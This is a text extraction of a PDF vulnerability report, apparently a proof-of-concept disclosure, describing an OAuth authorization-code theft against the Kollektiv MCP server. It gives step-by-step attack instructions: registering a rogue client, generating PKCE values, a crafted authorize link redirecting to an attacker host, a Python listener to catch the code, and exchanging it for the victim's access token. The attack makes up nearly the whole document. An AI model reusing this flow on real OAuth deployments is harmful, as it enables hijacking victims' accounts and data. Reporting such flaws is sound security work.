Kollektiv | Your private LLM knowledgebase

# kollektiv_vulnerability.pdf ## Metadata - PDFFormatVersion=1.3 - IsLinearized=false - IsAcroFormPresent=false - IsXFAPresent=false - IsCollectionPresent=false - IsSignaturesPresent=false - Producer=macOS 版本14.0（版号23A344） Quartz PDFContext - CreationDate=D:20250515053113Z00'00' - ModDate=D:20250515053113Z00'00' ## Contents ### Page 1 1. First, use the register api to register a evil client_id 2. Then we can use a javascript code to generate a pair of PKCE code, like below { 11 code_verifier: 'zJu_u20q542vkqHg790nzV4VkflNY023Qzx1ENFRZqk', 12 code_challenge : 'ogH32ysf0wlQY8KKJOGf1s5IWwtKoa1eEq - bMVTbqpg' 13 } 3. Then we replace the client_id,redirect_uri,code_challenge to generate an evil link. This is the original link https://mcp.thekollektiv.ai/authorize?response_type=code&client_id =q8WxVGfcGqFUG0vd&code_challenge=4kZ8ithQ_6gxonAkD_bV6M i8PC3bHhQEGIxGxd1rDVM&code_challenge_method=S256&redirect _uri=http%3A%2F%2F127.0.0.1%3A6274%2Foauth%2Fcallback And below one is the evil link https://mcp.thekollektiv.ai/authorize?response_type=code&client_id =HgYqLWh9OmedD8LJ&code_challenge=ogH32ysf0wlQY8KKJOGf1 s5IWwtKoa1eEq -,### Page 2 bMVTbqpg&code_challenge_method=S256&redirect_uri=http%3A%2 F%2Fexp.azraelxuemo.cn%3A9876%2Foauth%2Fcallback 4. Start a http server to receive the code Python3 - m http.server 9876 5. Send the link to victim Once the victim click the link, we can get the code 6. Get the token Replace the code, code_verifier, redirect_uri, client_id And we can get a valid access_token, just as the victim’s identity Then when can use the MCP Client tool to visit victim’s resource,### Page 3